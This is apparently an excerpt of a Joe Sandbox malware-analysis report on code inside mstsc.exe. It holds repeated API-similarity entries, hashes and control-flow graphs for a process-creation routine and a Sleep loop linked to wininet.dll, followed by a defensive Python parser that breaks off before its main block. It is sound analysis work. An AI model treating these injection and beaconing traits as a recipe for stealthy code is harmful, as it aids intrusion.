                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
• Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
• Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
• Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
APIs
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
APIs
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
• Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
• Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
• Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
APIs
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
• Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
• Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
• Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Control-flow Graph (block id: address range, calls; -> successor blocks)
• 402: 9a673-9a674 -> 403, 404
• 403: 9a61f-9a631 RtlAllocateHeap
• 404: 9a676-9a67c -> 405, 406
• 405: 9a67e -> 406
• 406: 9a6b6-9a6ca call 9af30 -> 408
• 408: 9a6cf-9a708 CreateProcessInternalW
APIs
• RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A62D
• CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A704
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Yara matches
Similarity
• API ID: AllocateCreateHeapInternalProcess
• String ID: 6E
• API String ID: 2739015735-729105364
• Opcode ID: 4713b156c88ead8abd4213c13b31e1c70b6fec864699777347c940a6c4da8641
• Instruction ID: 2303c34f091367c70a8d321dda5e5c5274b6fcc0b7fa89699ae2462e1a52504d
• Opcode Fuzzy Hash: 4713b156c88ead8abd4213c13b31e1c70b6fec864699777347c940a6c4da8641
• Instruction Fuzzy Hash: 6E1105B6314108ABCB18DF88DC80DEB77A9AF8C354F158259FA0DD3241C630E851CBA1

Control-flow Graph (block id: address range, calls; -> successor blocks)
• 426: 99050-9907f -> 427, 428
• 427: 9908b-99092 -> 429, 430
• 428: 99086 call 9bd10 -> 427
• 429: 99098-990e8 call 9bde0, call 8acf0, call 94e50 -> 437
• 430: 9916c-99172
• 437: 990f0-99101 Sleep -> 438, 439
• 438: 99103-99109 -> 440, 441
• 439: 99166-9916a -> 430, 437
• 440: 9910b-99131 call 98c70 -> 442
• 441: 99133-99153 -> 442, 443
• 442: 99159-9915c -> 439
• 443: 99154 call 98e80 -> 442
Blocks 437-443 form a loop (back edge 439 -> 437) around the Sleep call in block 437; block 430 is the only exit.
APIs
• Sleep.KERNELBASE(000007D0), ref: 000990F8 (0x7D0 = 2000 ms per iteration)
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: b3cc6ede37a4df4b243a9bd53cd8c514ab83cf967673df995bf4a9057cdcbca4
• Instruction ID: c38bd653bb9034a27e487ae66f9c4eb83f8689e95705c0bfb04ba96cc2d3701c
• Opcode Fuzzy Hash: b3cc6ede37a4df4b243a9bd53cd8c514ab83cf967673df995bf4a9057cdcbca4
• Instruction Fuzzy Hash: 7E3184B2500745BBCB24DF68C885FA7B7F8FB48B00F10811DF62A5B246DA70B650DBA5

Control-flow Graph (block id: address range, calls; -> successor blocks)
• 446: 99046-99092 call 9bd10 -> 449, 450
• 449: 99098-990e8 call 9bde0, call 8acf0, call 94e50 -> 457
• 450: 9916c-99172
• 457: 990f0-99101 Sleep -> 458, 459
• 458: 99103-99109 -> 460, 461
• 459: 99166-9916a -> 450, 457
• 460: 9910b-99131 call 98c70 -> 462
• 461: 99133-99153 -> 462, 463
• 462: 99159-9915c -> 459
• 463: 99154 call 98e80 -> 462
Blocks 457-463 form a loop (back edge 459 -> 457) around the Sleep call in block 457; this is the same loop body as the preceding entry, reached from an alternate entry point at 99046.
APIs
• Sleep.KERNELBASE(000007D0), ref: 000990F8 (0x7D0 = 2000 ms per iteration)
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 704c5e09ade98d2c29c28be02c6912d81491b4043571203d16c448f2bae5fa6e
• Instruction ID: 44b991115a7c7a29fe530dc1b18b37f51ce510e70c27e402798e914bced026d5
• Opcode Fuzzy Hash: 704c5e09ade98d2c29c28be02c6912d81491b4043571203d16c448f2bae5fa6e
• Instruction Fuzzy Hash: D121B4B1900241AFCB24DF68C885FABBBB4FB48B00F10811DF62D5B246D775A551DBA5

Control-flow Graph (block id: address range, calls; -> successor blocks)
• 578: 9a600-9a631 call 9af30, RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A62D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: 6E
• API String ID: 1279760036-729105364
• Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction ID: 1b6272288ef8ffb966947971173dd818e9710902374bf855a6b004b64de9da32
• Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction Fuzzy Hash: 40E012B2210208ABDB14EF99CC41EAB77ACAF88754F118559BA085B242CA30F9118AF0
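
The Control-flow Graph entries above are emitted by the report as a single token stream per function (block id, address range, API or `call <addr>` labels, `id->id` edges). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that stream, maps API names to basic blocks and finds natural loops, so the Sleep block can be shown to sit inside a loop without the rendered graph. The two inputs are the CreateProcessInternalW function and the Sleep-loop function listed above, copied verbatim from those entries; the token grammar is inferred from the listings on this page and is an assumption, not a documented Joe Sandbox format.

```python
"""Parse Joe Sandbox "control_flow_graph ..." block listings into a block
table and edge list, then locate API-calling blocks and loops.
Grammar (assumed from the listings on this page):
  <id> <start>[-<end>]   opens a basic block
  <ApiName>              Windows API called from the current block
  call <addr>            intra-module call from the current block
  <id>-><id>             edge between blocks
"""
import re
from collections import defaultdict

# Two listings copied from the report entries above (mstsc.exe, region 0x80000).
CFG_CREATEPROCESS = (
    "control_flow_graph 402 9a673-9a674 403 9a61f-9a631 RtlAllocateHeap "
    "402->403 404 9a676-9a67c 402->404 405 9a67e 404->405 406 9a6b6-9a6ca "
    "call 9af30 404->406 405->406 408 9a6cf-9a708 CreateProcessInternalW 406->408"
)
CFG_SLEEP_LOOP = (
    "control_flow_graph 426 99050-9907f 427 9908b-99092 426->427 428 99086 "
    "call 9bd10 426->428 429 99098-990e8 call 9bde0 call 8acf0 call 94e50 "
    "427->429 430 9916c-99172 427->430 428->427 437 990f0-99101 Sleep "
    "429->437 438 99103-99109 437->438 439 99166-9916a 437->439 440 "
    "9910b-99131 call 98c70 438->440 441 99133-99153 438->441 439->430 "
    "439->437 442 99159-9915c 440->442 441->442 443 99154 call 98e80 "
    "441->443 442->439 443->442"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
BLOCK_ID = re.compile(r"^\d+$")
ADDR_RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_cfg(line):
    """Return (blocks, succs): id -> {start, end, apis, calls} and id -> [successors]."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, succs, cur, i = {}, defaultdict(list), None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            succs[int(edge.group(1))].append(int(edge.group(2)))
            i += 1
        elif BLOCK_ID.match(tok) and i + 1 < len(tokens) and ADDR_RANGE.match(tokens[i + 1]):
            lo, hi = ADDR_RANGE.match(tokens[i + 1]).groups()   # "<id> <start>[-<end>]"
            cur = int(tok)
            blocks[cur] = {"start": int(lo, 16), "end": int(hi or lo, 16), "apis": [], "calls": []}
            i += 2
        elif tok == "call" and i + 1 < len(tokens):
            blocks[cur]["calls"].append(int(tokens[i + 1], 16))  # "call <addr>"
            i += 2
        else:
            blocks[cur]["apis"].append(tok)                       # bare API name
            i += 1
    return blocks, dict(succs)


def api_blocks(blocks):
    """Map each API name to the block ids that invoke it."""
    out = defaultdict(list)
    for bid, b in blocks.items():
        for api in b["apis"]:
            out[api].append(bid)
    return dict(out)


def entry_block(blocks, succs):
    """Function entry: the (lowest-numbered) block with no predecessor."""
    targets = {t for ts in succs.values() for t in ts}
    return min(b for b in blocks if b not in targets)


def back_edges(succs, entry):
    """DFS from entry; an edge to a block still on the DFS stack closes a loop."""
    colour, found = defaultdict(int), []     # 0 unvisited, 1 on stack, 2 done

    def visit(n):
        colour[n] = 1
        for m in succs.get(n, []):
            if colour[m] == 1:
                found.append((n, m))
            elif colour[m] == 0:
                visit(m)
        colour[n] = 2

    visit(entry)
    return found


def natural_loop(succs, tail, head):
    """Loop closed by tail->head: head plus all blocks reaching tail without passing head."""
    preds = defaultdict(list)
    for s, ts in succs.items():
        for t in ts:
            preds[t].append(s)
    body, stack = {head, tail}, [tail]
    while stack:
        for p in preds.get(stack.pop(), []):
            if p not in body:
                body.add(p)
                stack.append(p)
    return body


def loops_with_apis(line):
    """For each loop (keyed by its header block), the APIs called inside it."""
    blocks, succs = parse_cfg(line)
    result = {}
    for tail, head in back_edges(succs, entry_block(blocks, succs)):
        body = natural_loop(succs, tail, head)
        result[head] = sorted(api for b in body for api in blocks[b]["apis"])
    return result


if __name__ == "__main__":
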